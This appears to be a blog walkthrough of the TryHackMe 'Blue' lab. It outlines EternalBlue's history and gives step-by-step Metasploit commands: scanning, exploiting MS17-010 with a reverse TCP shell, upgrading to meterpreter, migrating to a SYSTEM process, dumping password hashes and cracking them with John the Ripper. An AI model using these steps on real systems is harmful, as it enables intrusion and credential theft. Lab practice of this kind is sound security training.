Red Team Training Series: An EternalBlue Saga

# Red Team Training Series: An EternalBlue Saga ###### tags: `cybersecurity` `ms17-010` `eternalblue` `exploit` `SMB` `walkthrough` `blue` This serves as a walkthrough for the room blue on THM ## Eternal Who? EternalBlue is a cyberattack exploit developed by the US National Security Agency which got leaked by the shadow brokers hacker group on April 14 2017, one month after microsoft released patches for the vulnerability. **Wannacry** leveraged this exploit to attack unpatched computers on May 12 2017. **NotPetya** also leveraged this exploit on June 27 2017 Having said that, you might still encounter it on your adventures. ## Eternal how? EternalBlue aka ms17-010 exploits a vulnerability in microsoft's implementation of the Server Message Block (SMB) protocol. It leverages on SMBv1 mishandling specially crafted packets allowing remote access. The vulnerability occurs because earlier versions of smb allow attackers to establish a null session connection via anonymous login ## msf all the way... partially anyway ping the host to make sure you can reach it scan the host with nmap: syntax: **nmap -sV -vv --script vuln [ip]** ![](https://i.imgur.com/PJ0kPrx.png) which shows that the target might be vulnerable to ms17-010 search for the eternal blue exploit on msf 1. **use exploit/windows/smb/ms17_010_eternalblue** 2. **set payload windows/x64/shell/reverse_tcp** 3. set options 4. take note to set the lhost to your ip , if you're using a vpn set it to your tun0 vpn address 5. **check** 6. **run** 7. once you get a session, background it with **ctrl Z**![](https://i.imgur.com/7VZ7VAM.png) 8. **use post/multi/manage/shell_to_meterpreter** 9. list sessions syntax: **sessions -l** 10. set the session to the assigned session 11. **set session [i]** 12. **run**![](https://i.imgur.com/iltyoN7.png) 13. migrate the meterpreter shell to a more stable process since you will use it to dump credentials later on 14. **ps** to view all processes, noting the PID(process id), target something running with System level permissions. Note that to migrate a process you need to have the same or higher permissions. If you migrate to a process with lower permissions, you cannot reverse this action. 15. **migrate [PID]**![](https://i.imgur.com/qfg2U2Z.png) 16. **hashdump** to get hashes, copy them to a txt file 17. use john the ripper to crack hashes 18. **john hashes.txt --format=NT --wordlist=rockyou.txt** 19. view cracked hashes: **john hashes.txt --format=NT --show** ![](https://i.imgur.com/JiqD3m6.png) A good place to practice this is [tryhackme's blue room](https://tryhackme.com/room/blue) A better understanding can be gotten from reading [null byte's article](https://null-byte.wonderhowto.com/how-to/exploit-eternalblue-windows-server-with-metasploit-0195413/) That's it for blue :)